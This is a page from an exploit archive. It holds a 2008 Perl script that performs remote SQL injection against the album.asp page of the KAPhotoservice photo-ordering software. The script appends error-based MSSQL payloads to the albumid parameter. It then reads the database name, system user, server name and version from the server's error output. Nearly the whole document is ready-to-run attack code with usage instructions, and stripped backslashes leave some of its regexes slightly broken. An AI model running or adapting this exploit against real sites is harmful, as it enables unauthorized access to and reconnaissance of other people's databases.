[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : KAPhotoservice (album.asp) Remote SQL Injection Exploit
# Published : 2008-03-18
# Author : JosS
# Previous Title : Joomla Component Acajoom (com_acajoom) SQL Injection Vulnerability
# Next Title : Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ KAPhotoservice (album.asp) Remote SQL Injection Exploit +==--
--==+====================================================================================+==--
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: KAPhotoservice (Payment)
[~] Demo: http://www.kaphotoservice.com/photoservice/
[~] Exploit: Remote SQL Injection [High]
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Vuln File: album.asp
[+] Exploit:
#!/usr/bin/perl
# KAPhotoservice - Remote SQL Injection Exploit
# Code by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
sub lw
{
my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title KAPhotoservice - Remote SQL Injection Exploit");
system ("color 02");
}
}
#*************************** expl ******************************
&lw;
print "tt########################################################nn";
print "tt# KAPhotoservice - Remote SQL Injection Exploit #nn";
print "tt# by JosS #nn";
print "tt########################################################nn";
$host=$ARGV[0];
chop $host;
$host=$host."/album.asp?cat=&apage=&albumid=";
if(!$ARGV[0]) {
print "n[x] KAPhotoservice - Remote SQL Injection Exploitn";
print "[x] written by JosS - sys-project[at]hotmail.comn";
print "[x] usage: perl $0 [host]n";
print "[x] example: http://host.com/PHPWebquestn";
exit(1);
}
@comando=("1+and+1=convert(int,db_name())","1+and+1=convert(int,system_user)","1+and+1=convert(int,@@servername)--",'1+and+1=convert(int,@@version)--');
for ($i=0;$i<=3;$i++)
{
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
if ( $doc =~ /Syntaxs(.*)</font>/mosix )
{
if ($comando[$i] eq "1+and+1=convert(int,db_name())")
{
print "db_name:n";
$dbname = $1 if ($doc =~ /.*values'(.*)'sto.*/);
print "$dbnamenn";
}
if ($comando[$i] eq "1+and+1=convert(int,system_user)")
{
print "system_user:n";
$systemuser = $1 if ($doc =~ /.*values'(.*)'sto.*/);
print "$systemusernn";
}
if ($comando[$i] eq "1+and+1=convert(int,@@servername)--")
{
print "servername:n";
$servername = $1 if ($doc =~ /.*values'(.*)'sto.*/);
print "$servernamenn";
}
if ($comando[$i] eq '1+and+1=convert(int,@@version)--')
{
print "version:n";
$version = $1 if ($doc =~ /.*?values'(.*?)'sto.*/sm);
print "$versionnn";
}
} # Cierre del if principal
} # cierre for
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ JosS +==--
--==+====================================================================================+==--
[+] [The End]
# www.Syue.com [2008-03-18]